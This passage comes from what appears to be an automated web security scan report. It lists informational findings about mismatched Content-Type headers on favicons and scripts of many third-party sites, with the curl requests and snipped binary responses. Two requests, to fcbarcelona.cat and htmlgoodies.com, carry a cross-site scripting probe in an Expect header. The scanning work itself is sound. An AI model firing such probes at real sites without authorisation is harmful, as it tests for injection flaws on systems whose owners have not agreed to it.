Content-Length: 162
Content-Type: text/plain

GIF89a........D..E.C..D..D..C..C...E..D.C..D.................!.......,........@.Op.I.D*.4RN.......RH..Hk.... ."h..H..o..h2.B.(kRH.@..L......Yf.F.plLt..3sR...NJ..;

31.88. http://www.fcbarcelona.cat/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fcbarcelona.cat
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fcbarcelona.cat
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 08 Jan 2008 15:36:22 GMT
ETag: "24b400a-37e-bd1e8980"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=iso-8859-1
Date: Tue, 03 May 2011 10:20:19 GMT
Connection: close

..............h.......(....... ....................................................pvyy......................................4MY0@.Dd.Ca/?4NY.........................>P.)Y@&,b*.?.i;.qb*.C&%.'V..>...
...[SNIP]...

31.89. http://www.fightpp.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fightpp.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.90. http://www.findstudentloans.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.findstudentloans.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findstudentloans.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 24 Jun 2010 14:20:47 GMT
ETag: "1ca0086-ec6-489c75c4eadc0"
Accept-Ranges: bytes
Content-Length: 3782
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=ISO-8859-1

............ .........(.......<..... .........................lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO.lO
...[SNIP]...

31.91. http://www.flvsoft.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.flvsoft.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flvsoft.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:53 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Fri, 12 Mar 2010 17:02:20 GMT
ETag: "cf46ab-37e-7e8f1f00"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain

..............h.......(....... ...........@............................................................................&&.11.55.88.77.55.66.44.00.))................11.bb.............dd.oo.mm.ff.ZZ.@@.
...[SNIP]...

31.92. http://www.foofighters.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foofighters.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foofighters.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:21:23 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 33
Connection: close
Content-Type: text/html; charset=iso-8859-1

The requested file was not found.

31.93. http://www.forconstructionpros.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.forconstructionpros.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.forconstructionpros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:46 GMT
Server: Apache
Last-Modified: Tue, 18 Nov 2008 17:48:25 GMT
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................@n......t...TCS..t...=............O.p.......H.......?%-.<R..:...)g}...#.s...E.......nal.......{...i.....S...7G.X.
...[SNIP]...

31.94. http://www.foreclosurelistingsnationwide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foreclosurelistingsnationwide.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foreclosurelistingsnationwide.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 08 Jul 2009 06:07:45 GMT
ETag: "330049-57e-8ec88e40"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ................................z........@...M......... ........................
....................%
..'..!...$...'...&.../...7...)#..-*..0/..4...12..25..7:..8:..E>
...[SNIP]...

31.95. http://www.foundingfathers.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foundingfathers.info
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foundingfathers.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:57:04 GMT
Server: Apache
Last-Modified: Tue, 04 May 2010 16:39:54 GMT
ETag: "2b103f-13e-5bebaa80"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain

..............(.......(....... .......................................................................................................DDDDDDDIDDDODDDIDD.DD.DIDDDDDDDID.DDDD.IDDDDDDDIDDDDDDDIODDDDDOIDD
...[SNIP]...

31.96. http://www.foxsportskansascity.com/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foxsportskansascity.com
Path:	/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.97. http://www.foxyhousewives.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foxyhousewives.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foxyhousewives.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Jul 2008 22:03:03 GMT
ETag: "b96aa-c6-45111a813b3c0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/plain; charset=UTF-8

......................(....... .......................................................................................................................................................................

31.98. http://www.frbsf.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.frbsf.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.frbsf.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:39 GMT
Server: Apache
Last-Modified: Tue, 26 Jan 2010 23:05:57 GMT
ETag: "57e-54183f40"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........................................f...3...................f...3...................f...3........f...f...f..ff..3f...f...3...3...3..f3..33...3..............f...3.
...[SNIP]...

31.99. http://www.freeonlinesoftware.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.freeonlinesoftware.info
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeonlinesoftware.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 06 Oct 2009 06:53:51 GMT
ETag: "2f803b0-4486-b15e1dc0"
Accept-Ranges: bytes
Content-Length: 17542
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

......00.... ..%..F... .... ......%........ .. ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

31.100. http://www.freevistafiles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.freevistafiles.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freevistafiles.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 01 Jun 2007 14:22:40 GMT
ETag: "1840003-56a-431d8f29e4c00"
Accept-Ranges: bytes
Content-Length: 1386
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:11 GMT
Content-Type: text/plain; charset=UTF-8

..............T.......(...................,....................fi.AB...BJ..#&.....!%..ko.Z\..ff..............UU...cj..<C..........7>..39.zz...........W^..................v|.....XY..........::..EG...U
...[SNIP]...

31.101. http://www.gasparinutrition.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gasparinutrition.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.102. http://www.gavilan.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gavilan.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gavilan.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:44 GMT
Server: Apache
Last-Modified: Sat, 26 Mar 2011 04:48:15 GMT
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=300
Expires: Tue, 03 May 2011 11:16:44 GMT
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h.......(....... ...........@................................................................................... .........,,,.999.EEE.RRR.___.lll.xxx...................................
...[SNIP]...

31.103. http://www.gecu-ep.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gecu-ep.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gecu-ep.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.104. http://www.getmyhomesvalue.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.getmyhomesvalue.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getmyhomesvalue.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Mar 2010 13:22:45 GMT
ETag: "d000a65a-57e-481723195d340"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ..................................................................................456.........,-......................]]^.............................................UV
...[SNIP]...

31.105. http://www.getrv.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.getrv.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getrv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 04 Feb 2009 17:20:59 GMT
ETag: "4621b02e454c0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ................................3..f3...f...f3...............f.......................f.........""".))).UUU.MMM.BBB.999..|..PP........................3...f..........3...3
...[SNIP]...

31.106. http://www.giftcards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.giftcards.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.giftcards.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:31 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 18:13:25 GMT
ETag: "108ef8-25be-4956bdcc85b40"
Accept-Ranges: bytes
Content-Length: 9662
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/plain; charset=UTF-8

......00.... ..%......(...0...`..... ......$............................................................................................................................................................
...[SNIP]...

31.107. http://www.glowfoto.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.glowfoto.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.glowfoto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:27 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Thu, 01 Feb 2007 09:48:57 GMT
ETag: "3740026-47e-22c63440"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................hK..u\.|sg.............njd.RE4.}fJ.hK.hK.hK.hK.hK.hK.hK..h.............................KA5.hK.hK.hK.hK.hK.hK.hK...........
...[SNIP]...

31.108. http://www.googleimages.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.googleimages.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.googleimages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:50 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Last-Modified: Thu, 02 Dec 2010 20:03:40 GMT
ETag: "784130-2fe-eb011f00"
Accept-Ranges: bytes
Content-Length: 766
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

...... ..............(... ...@................................................................................................................................................wwwwwwwwwwwwwx..wwwwwwt.w
...[SNIP]...

31.109. http://www.greatgardenplants.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.greatgardenplants.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatgardenplants.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 05 Apr 2009 01:32:44 GMT
ETag: "1ef00a0-22-466c4c22a0700"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/html; charset=UTF-8

31.110. http://www.greenway.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.greenway.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.111. http://www.grubhub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.grubhub.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grubhub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.112. http://www.gruntsmilitary.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gruntsmilitary.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gruntsmilitary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:45 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 01:17:08 GMT
ETag: "37e-49d75abeccd00"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: public
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..............................................................................................x..b........I.....................................O..Z..W..R..............
...[SNIP]...

31.113. http://www.h2onews.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.h2onews.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.h2onews.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 09:29:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 08 Nov 2009 14:35:04 GMT
ETag: "d368227-cbe-fb91f600"
Accept-Ranges: bytes
Content-Length: 3262
Connection: close
Content-Type: text/plain; charset=UTF-8

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

31.114. http://www.hamsterwatch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.hamsterwatch.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hamsterwatch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 17 Jun 2010 23:35:17 GMT
ETag: "19c28a-47e-4a76f740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... .............................RR...!..JJ..s{..................................................................BJ..............JR......................1B............
...[SNIP]...

31.115. http://www.have-fun-in-the-southwest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.have-fun-in-the-southwest.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.have-fun-in-the-southwest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:01 GMT
Server: Apache
Last-Modified: Wed, 11 Aug 2010 05:30:24 GMT
ETag: "75d70c-1636-48d858be43c00"
Accept-Ranges: bytes
Content-Length: 5686
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h...&... .... .........(....... ...............................}N,..F...M...U...N#..S/..Z2..U&..^ ..\)..a0..a5..`(..d%..h+..g7..h8..c#..e-..h$..h&..k3..n1..|0..tI..sF..uF..qV..w_..xf..}
...[SNIP]...

31.116. http://www.healthiertalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.healthiertalk.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthiertalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 10 Nov 2008 14:28:43 GMT
ETag: "457001d-1ab6-45b5694773cc0"
Accept-Ranges: bytes
Content-Length: 6838
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:32:43 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

............ .h...&...( .... .(.......(....... ..... ...................................................................................................................................................
...[SNIP]...

31.117. http://www.healthy-oil-planet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.healthy-oil-planet.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthy-oil-planet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:46 GMT
Server: Apache
Last-Modified: Wed, 07 May 2008 16:14:50 GMT
ETag: "1a9c2bd-e36-44ca643a4d280"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h...&... ..............(....... ...........@...............................J.R.{...1Y..).......R...c...)}).!.s.............1.......Z...{...9...)...).J.....1...Z...!...R...s...9.k.k...c.
...[SNIP]...

31.118. http://www.helloindianapolis.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.helloindianapolis.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:52:32 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.119. http://www.helminc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.helminc.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.120. http://www.homebasedbusinessmatchingservice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homebasedbusinessmatchingservice.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homebasedbusinessmatchingservice.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.121. http://www.homesolutionsnews.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homesolutionsnews.us
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homesolutionsnews.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Mar 2011 13:34:25 GMT
ETag: "c885f3-4486-49f8b00879a40"
Accept-Ranges: bytes
Content-Length: 17542
Connection: close
Content-Type: text/plain

......00.... ..%..F... .... ......%........ .. ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

31.122. http://www.htmlgoodies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.htmlgoodies.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.htmlgoodies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 08 Mar 2011 21:40:44 GMT
ETag: "426e-49dff76e84f00"
Accept-Ranges: bytes
Content-Length: 17006
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=7809
Date: Tue, 03 May 2011 10:58:29 GMT
Connection: close

...... ..........6...........h.......@@......(2..F...(... ...@.........................................................................................................................................
...[SNIP]...

31.123. http://www.hvacagent.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.hvacagent.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.124. http://www.idg.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.idg.com.au
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
